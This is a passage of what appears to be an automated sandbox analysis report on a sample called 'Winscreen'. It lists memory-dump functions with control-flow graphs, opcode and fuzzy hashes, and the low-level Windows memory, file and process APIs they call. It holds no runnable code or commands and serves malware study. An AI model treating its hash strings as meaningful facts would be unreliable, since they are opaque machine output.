                                                                                        • Instruction Fuzzy Hash: 0C41C03191CB4C8FDB58EF5898456EDBBF1EB99320F00426EE449D3256CB74A8418BC6
                                                                                        Function 00007FF848F13BB2 Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1162 7ff848f13bb2-7ff848f13be8 1165 7ff848f13bea-7ff848f13c14 1162->1165 1166 7ff848f13c3d-7ff848f13ce8 NtQueryInformationProcess 1162->1166 1165->1166 1172 7ff848f13cea 1166->1172 1173 7ff848f13cf0-7ff848f13d18 1166->1173 1172->1173
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 000d8750d2030663630f2f06c51cdb4033ac6a9af1ec7380cc01c0e81d9761cf
                                                                                        • Instruction ID: 784547cca52bc940dfc1b3db28cdefcaf4a5d68a21ac8e93a15f793fea97f717
                                                                                        • Opcode Fuzzy Hash: 000d8750d2030663630f2f06c51cdb4033ac6a9af1ec7380cc01c0e81d9761cf
                                                                                        • Instruction Fuzzy Hash: 5F41F63190CB8C4FDB19EB6C98166A97FF0EF95311F0442AFD089D3293CB286849C786
                                                                                        Function 00007FF848F1449D Relevance: 1.7, APIs: 1, Instructions: 151filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1175 7ff848f1449d-7ff848f144a9 1176 7ff848f144ab-7ff848f144b3 1175->1176 1177 7ff848f144b4-7ff848f145ac NtOpenFile 1175->1177 1176->1177 1182 7ff848f145ae 1177->1182 1183 7ff848f145b4-7ff848f145df 1177->1183 1182->1183
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2669468079-0
                                                                                        • Opcode ID: e45c493f26c157815c03ec4476bf922ad253d14b212e80292e2df2397aadd164
                                                                                        • Instruction ID: 9ea8074a9a2ef0523578e3c4d9733c3302fac3d662f3b6c47dd2addf92c19332
                                                                                        • Opcode Fuzzy Hash: e45c493f26c157815c03ec4476bf922ad253d14b212e80292e2df2397aadd164
                                                                                        • Instruction Fuzzy Hash: 3641D63190CB4C4FDB58EF6898457ED7BF1EB99320F00426FE44DD3292CA74A8458B86
                                                                                        Function 00007FF848F14029 Relevance: 1.6, APIs: 1, Instructions: 146memorynativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1185 7ff848f14029-7ff848f14035 1186 7ff848f14040-7ff848f14129 NtAllocateVirtualMemory 1185->1186 1187 7ff848f14037-7ff848f1403f 1185->1187 1192 7ff848f1412b 1186->1192 1193 7ff848f14131-7ff848f1415c 1186->1193 1187->1186 1192->1193
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: b76e62b3669d40e60c7e6f1d273fafa82dbbb1030459e8de13f83e1387404c5d
                                                                                        • Instruction ID: e0872dc14c15c22b9796ffe8b8df65c7b0a8e077e0a9178f70e26cf923db0e7a
                                                                                        • Opcode Fuzzy Hash: b76e62b3669d40e60c7e6f1d273fafa82dbbb1030459e8de13f83e1387404c5d
                                                                                        • Instruction Fuzzy Hash: B741C43190CB4C8FDB19EF5898456EDBBF1EB95321F04426FE449D3252CB74A845CB86
                                                                                        Function 00007FF848F13EF8 Relevance: 1.6, APIs: 1, Instructions: 144nativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1195 7ff848f13ef8-7ff848f13eff 1196 7ff848f13f0a-7ff848f13ff3 NtProtectVirtualMemory 1195->1196 1197 7ff848f13f01-7ff848f13f09 1195->1197 1202 7ff848f13ffb-7ff848f14026 1196->1202 1203 7ff848f13ff5 1196->1203 1197->1196 1203->1202
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-0
                                                                                        • Opcode ID: 64bff5f268f99653a03208fadf84e5bf205ca852737db66e806d214f2b696941
                                                                                        • Instruction ID: 3b25b28ff1b34b56bc32c1e27d4db7c4664d80a61c97cb2f0f43621b868bc63f
                                                                                        • Opcode Fuzzy Hash: 64bff5f268f99653a03208fadf84e5bf205ca852737db66e806d214f2b696941
                                                                                        • Instruction Fuzzy Hash: 4541A73191CB484FDB5CEB5CA8066E97BE1EB99320F00426FE44DD3292CF7568458BD6
                                                                                        Function 00007FF848F149C9 Relevance: 1.6, APIs: 1, Instructions: 133filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1205 7ff848f149c9-7ff848f149d5 1206 7ff848f149e0-7ff848f14aa5 NtQueryVolumeInformationFile 1205->1206 1207 7ff848f149d7-7ff848f149df 1205->1207 1211 7ff848f14aad-7ff848f14ad3 1206->1211 1212 7ff848f14aa7 1206->1212 1207->1206 1212->1211
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInformationQueryVolume
                                                                                        • String ID:
                                                                                        • API String ID: 634242254-0
                                                                                        • Opcode ID: d602b7d030569f005e1d9953651b3a6849582bbcfbe8acdda89fa62eb2c600ef
                                                                                        • Instruction ID: 4085dcac00872d389ee0d5411d7e63c8d7be0d9eac837a62d4f2f751988e6ea1
                                                                                        • Opcode Fuzzy Hash: d602b7d030569f005e1d9953651b3a6849582bbcfbe8acdda89fa62eb2c600ef
                                                                                        • Instruction Fuzzy Hash: 5341043190CB4C4FDB19AF6898466F9BBF1EF56320F00426FD489C3292CB746856CB96
                                                                                        Function 00007FF848F1473D Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationQuerySystem
                                                                                        • String ID:
                                                                                        • API String ID: 3562636166-0
                                                                                        • Opcode ID: 4ec6f372187d25f8a54812bdbdc538136d1e8dce27b9e7be008f5d44fecff2c9
                                                                                        • Instruction ID: ff93dfa2958df24796481ef27ca0b72cbd4ca76d9016b788d12c067d2ae4ccd2
                                                                                        • Opcode Fuzzy Hash: 4ec6f372187d25f8a54812bdbdc538136d1e8dce27b9e7be008f5d44fecff2c9
                                                                                        • Instruction Fuzzy Hash: 4D31E63190CB4C5FDB18EB9C98466FD7BE1EB95321F04426FE049C3292DB746806CB86
                                                                                        Function 00007FF848F13C19 Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationProcessQuery
                                                                                        • String ID:
                                                                                        • API String ID: 1778838933-0
                                                                                        • Opcode ID: 63650a1e065482c6190e92cd70c25d7e67328325393197fe8828144e888e9fbc
                                                                                        • Instruction ID: bf9686bd9d2d1679848c4f27270d8b2a30bafb28306e90c9d193cb12916bc75d
                                                                                        • Opcode Fuzzy Hash: 63650a1e065482c6190e92cd70c25d7e67328325393197fe8828144e888e9fbc
                                                                                        • Instruction Fuzzy Hash: C931073190CB4C4FDB18EB5C984A6EE7BE1EB95310F00426FE089C3252CB74A805CBC6
                                                                                        Function 00007FF848F13D20 Relevance: 1.6, APIs: 1, Instructions: 123nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationThread
                                                                                        • String ID:
                                                                                        • API String ID: 4046476035-0
                                                                                        • Opcode ID: d2becfe4b323104a62510d2714b5d0c2864afb4d33b091b79aa19f87d8288886
                                                                                        • Instruction ID: 6d65204f0123add4d8662be6f6d75746b3b651913a9f3a031d1d84d8d5d2c3ed
                                                                                        • Opcode Fuzzy Hash: d2becfe4b323104a62510d2714b5d0c2864afb4d33b091b79aa19f87d8288886
                                                                                        • Instruction Fuzzy Hash: A8310A3190CB4C5FEB1CAB6C98066F9BBE1EB95321F00426FD049C3592CF796856CB95
                                                                                        Function 00007FF848F14278 Relevance: 1.6, APIs: 1, Instructions: 114nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionUnmapView
                                                                                        • String ID:
                                                                                        • API String ID: 498011366-0
                                                                                        • Opcode ID: 0b363c4bca6176b0096670fb3c45a106cfe3112fa546e174fa6efe1ae534a556
                                                                                        • Instruction ID: 4f030843dbeb1de38f25df82099c50e3c3772dac2720932859ff812fab1c5069
                                                                                        • Opcode Fuzzy Hash: 0b363c4bca6176b0096670fb3c45a106cfe3112fa546e174fa6efe1ae534a556
                                                                                        • Instruction Fuzzy Hash: 4731EA3190CB484FEB1CEB68980A6FE7BE1EB65321F04413FD04AC3192DF656846CB95
                                                                                        Function 00007FF848F13E14 Relevance: 1.6, APIs: 1, Instructions: 110nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 61a81863f069b237cd8c57f034047a0c3ee84ac71ccf1fc6fc32e5780cf7540f
                                                                                        • Instruction ID: 856185226d0b221a19d3dbd169af128ab1a8029a0a7ae9008c89746d1612593d
                                                                                        • Opcode Fuzzy Hash: 61a81863f069b237cd8c57f034047a0c3ee84ac71ccf1fc6fc32e5780cf7540f
                                                                                        • Instruction Fuzzy Hash: 6A31273190C74C8FEB59EBA8884A7E97BE0EB55320F04416FD049C3192CB785845CB91
                                                                                        Function 00007FF848F02FAC Relevance: 1.6, Strings: 1, Instructions: 358COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -P7
                                                                                        • API String ID: 0-724324931
                                                                                        • Opcode ID: 4654cd3da6527e2fd8979eb10deb949ae09ebca25c784f9e1bc9278374ea5d5d
                                                                                        • Instruction ID: ede85cf29741d7921b7b5f26293d99754d7d44c51eaff558834d2e1735dffc3c
                                                                                        • Opcode Fuzzy Hash: 4654cd3da6527e2fd8979eb10deb949ae09ebca25c784f9e1bc9278374ea5d5d
                                                                                        • Instruction Fuzzy Hash: 78A12672F1EE4A5FE798BA2C580517A23D2EFD5694F45013AD40EC73DBEE28AC468340
                                                                                        Function 00007FF848F0533F Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /
                                                                                        • API String ID: 0-2393058793
                                                                                        • Opcode ID: a18b4d27310e68f3935df33c40cfbea9941d3a67102b5fa6d5dffb2e67858ecd
                                                                                        • Instruction ID: d2e9f455770945ff0aafc2c7b449205fe832067bde880a62e8b669799452f38c
                                                                                        • Opcode Fuzzy Hash: a18b4d27310e68f3935df33c40cfbea9941d3a67102b5fa6d5dffb2e67858ecd
                                                                                        • Instruction Fuzzy Hash: A1A10572F0DE4A5FE398BA2C581517A63D2EFE9694F04003AD40EC73D6EE28EC468745
                                                                                        Function 00007FF848F1AC10 Relevance: 1.5, Instructions: 1534COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1cf61c4573bfab733529c1fb1f720a3b4e67ea0028c62122a7a2f48df013c817
                                                                                        • Instruction ID: 514ccd8b06a7d0f1a3478e482d61c7cee395dc3f99a2019090b8188507aaec13
                                                                                        • Opcode Fuzzy Hash: 1cf61c4573bfab733529c1fb1f720a3b4e67ea0028c62122a7a2f48df013c817
                                                                                        • Instruction Fuzzy Hash: 3EB25A30A1C9098FDB98FB28C4A4EA577E1FF59354F5841B9E05EC71E2DB26AC42CB44
                                                                                        Function 00007FF848F16ABD Relevance: 1.0, Instructions: 965COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 649fb941a7078d315018c4ab039cf0fb0ee8e22ba79ff10a1bad6498fa0f6fe7
                                                                                        • Instruction ID: f325e8bf3440761a9128f574c5b2a75a10513d54a7b3db4b8d737ff1a79b2645
                                                                                        • Opcode Fuzzy Hash: 649fb941a7078d315018c4ab039cf0fb0ee8e22ba79ff10a1bad6498fa0f6fe7
                                                                                        • Instruction Fuzzy Hash: 9F628D30A1CA098FE759EB28C49497573A2FF94344F60457DD48E876DADB39BC42CB84
                                                                                        Function 00007FF848F01C5E Relevance: .9, Instructions: 933COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c578d5990e516e64013a7a8ea734cf30e2e097179d9f66f24f2480a5542d8d8
                                                                                        • Instruction ID: 53b94cff07699ebfcc6200c3c4f52a0c631ef51293a455af757a94fa53152bf1
                                                                                        • Opcode Fuzzy Hash: 7c578d5990e516e64013a7a8ea734cf30e2e097179d9f66f24f2480a5542d8d8
                                                                                        • Instruction Fuzzy Hash: 0B523572F0EE4A5FE359AA6D580507A33D2EFD5A80B45007ED409CB3D7EE38AC468745
                                                                                        Function 00007FF848F012EB Relevance: .7, Instructions: 664COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a6f1f6c82233502ec9196825fa2ecf7fccc899093e438321c0e59d950ef86d4b
                                                                                        • Instruction ID: f4c23fda07986fe1d8b385790f9ad908202ff566e330d624a3913a902304808a
                                                                                        • Opcode Fuzzy Hash: a6f1f6c82233502ec9196825fa2ecf7fccc899093e438321c0e59d950ef86d4b
                                                                                        • Instruction Fuzzy Hash: F0123732F0EE4A4FE398AA2D580507973D3EFE5690B55017AD40ACB3D6EE38EC468745
                                                                                        Function 00007FF848F01754 Relevance: .6, Instructions: 638COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22a214b9a2fd758d3aaadef0a68cc0253ef65470ed12c874bb0c906bd4261be6
                                                                                        • Instruction ID: 3981f9943b0684a745c9181ca987b79e5e6cf3e7a75ef9e058a6911499bab3d2
                                                                                        • Opcode Fuzzy Hash: 22a214b9a2fd758d3aaadef0a68cc0253ef65470ed12c874bb0c906bd4261be6
                                                                                        • Instruction Fuzzy Hash: 19023972F0DE4A4FE398BA2D580507973D2EFD5A50B45017ED40AC73D7EE28AC468345
                                                                                        Function 00007FF848F08F16 Relevance: .6, Instructions: 637COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f0f7fef9318d83428e9f9ac434fced79c935259a8d8a588e218fe6469c8e4cc
                                                                                        • Instruction ID: 57b262877737d4eb82db56ed8c9634d99ad812f7ae3be798713387fc018c8616
                                                                                        • Opcode Fuzzy Hash: 2f0f7fef9318d83428e9f9ac434fced79c935259a8d8a588e218fe6469c8e4cc
                                                                                        • Instruction Fuzzy Hash: 79027632B1DA064FE759AB2C884117973D3EBD6380F59027DD48ECB6D6FE38A8068745
                                                                                        Function 00007FF848F023A0 Relevance: .6, Instructions: 628COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2477d6c5a98ad62f64e35567b41f5083e79e2d290516f75cc106f62a4d0e76b4
                                                                                        • Instruction ID: e27569955ae502aa32ea8694a87c33d06aa17e1d939e2621f06338475095a5dd
                                                                                        • Opcode Fuzzy Hash: 2477d6c5a98ad62f64e35567b41f5083e79e2d290516f75cc106f62a4d0e76b4
                                                                                        • Instruction Fuzzy Hash: 4B024732F0EE4A4FE359AA2D580507973D3EFE5A90B55007AD40ACB3D7EE38AC468345
                                                                                        Function 00007FF848F07991 Relevance: .6, Instructions: 625COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a154182ebfdd707416449ec622be18e8720e2ff926e1ada8f0411e8be733b004
                                                                                        • Instruction ID: 56730f3a4e3cc6140de776cf1ef07b4f6dd7cf4a8f46f04a10041fa7851b1964
                                                                                        • Opcode Fuzzy Hash: a154182ebfdd707416449ec622be18e8720e2ff926e1ada8f0411e8be733b004
                                                                                        • Instruction Fuzzy Hash: EA222772E0DB864FE364AB2894456BA77E2EFD5750F0404BED04DC73D6DE38A8458742
                                                                                        Function 00007FF848F0278C Relevance: .5, Instructions: 472COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b7d0603acd5dc659132f385ddf12c9f0d87a03be68905f1ccbefb8359fb4f429
                                                                                        • Instruction ID: de89105a90417ed233e0bca17e319f1164ff1509ef155723ac9d6bec4ca43afb
                                                                                        • Opcode Fuzzy Hash: b7d0603acd5dc659132f385ddf12c9f0d87a03be68905f1ccbefb8359fb4f429
                                                                                        • Instruction Fuzzy Hash: B8D13672F0EE4A4FE399BA2C580517963D2EFE5690B55017ED40DC73D7EE38AC468281
                                                                                        Function 00007FF848F029D6 Relevance: .4, Instructions: 394COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2c404ae912862cdcfaf4971518cf55d21287211dd7cf28a2105d35627bcd6de0
                                                                                        • Instruction ID: 2daa02636ae947ad41536948d1cdd0fc970aa822ab7b7b98d97b9549248007ee
                                                                                        • Opcode Fuzzy Hash: 2c404ae912862cdcfaf4971518cf55d21287211dd7cf28a2105d35627bcd6de0
                                                                                        • Instruction Fuzzy Hash: 57B13672F0DE4A5FE398BA2C585517923D2EFD5690B45013ED40AC73DBEE38AC468385
                                                                                        Function 00007FF848F05BA2 Relevance: .4, Instructions: 388COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3bc9b7164da4c0f94a32a4a5980e76a5e30898c863b3f6cb4f67ec740fa788f7
                                                                                        • Instruction ID: 74339f1aa69a2eaeeb819f82067f589bb05458c77a9b3a01187c5eae03b13848
                                                                                        • Opcode Fuzzy Hash: 3bc9b7164da4c0f94a32a4a5980e76a5e30898c863b3f6cb4f67ec740fa788f7
                                                                                        • Instruction Fuzzy Hash: EFC13772E1DA4A4FE3A8BA2C98555BA73E2EFD5740F04053ED40DC73D6EE38A8458B41
                                                                                        Function 00007FF848F039EE Relevance: .4, Instructions: 381COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 486011de4ece6dd3dd433d598d852a1a3a92f708d67543f1db6bec70cdd78f65
                                                                                        • Instruction ID: 60fec1177a5a43aa9e3c41d2fe378a9a095bf78632737dac213eefd816392aeb
                                                                                        • Opcode Fuzzy Hash: 486011de4ece6dd3dd433d598d852a1a3a92f708d67543f1db6bec70cdd78f65
                                                                                        • Instruction Fuzzy Hash: DAB11573F0EE4A5FE358BA2C580517923D2EFE5690B55017AD40EC73DAEE28AC468385
                                                                                        Function 00007FF848F0DA9A Relevance: .3, Instructions: 342COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c348ab0c85974384b3b95d6454b0aaa9c956e3fff5e374a0de5f100e080eb839
                                                                                        • Instruction ID: 00a860a634983677412abb8fc40f470d4ec78e165bdf7186b0e23ed4b76bf599
                                                                                        • Opcode Fuzzy Hash: c348ab0c85974384b3b95d6454b0aaa9c956e3fff5e374a0de5f100e080eb839
                                                                                        • Instruction Fuzzy Hash: AA913932F0DD4A4FE7A9B62C645827567D2EFE92A1B1902BBC00DCB2D6EE14DC068345
                                                                                        Function 00007FF848F057C2 Relevance: .3, Instructions: 340COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a9687e96e2e83df608c9d43485cfb5774822a5f100943ff4d905d3d2b4af3178
                                                                                        • Instruction ID: d396d478a97151cfddd3c45eefdc14027ccf120feb849f139ddd48cadcb64eba
                                                                                        • Opcode Fuzzy Hash: a9687e96e2e83df608c9d43485cfb5774822a5f100943ff4d905d3d2b4af3178
                                                                                        • Instruction Fuzzy Hash: 82A12872F1DE4A5FE398BA2C580517A63D2EFE5690F14013AD40EC73DAEE38AC468741
                                                                                        Function 00007FF848F0052D Relevance: .3, Instructions: 311COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 65ac3591916b28c057b4e0274d6191d5c36be4085fa0cb9ac177ee8040c08858
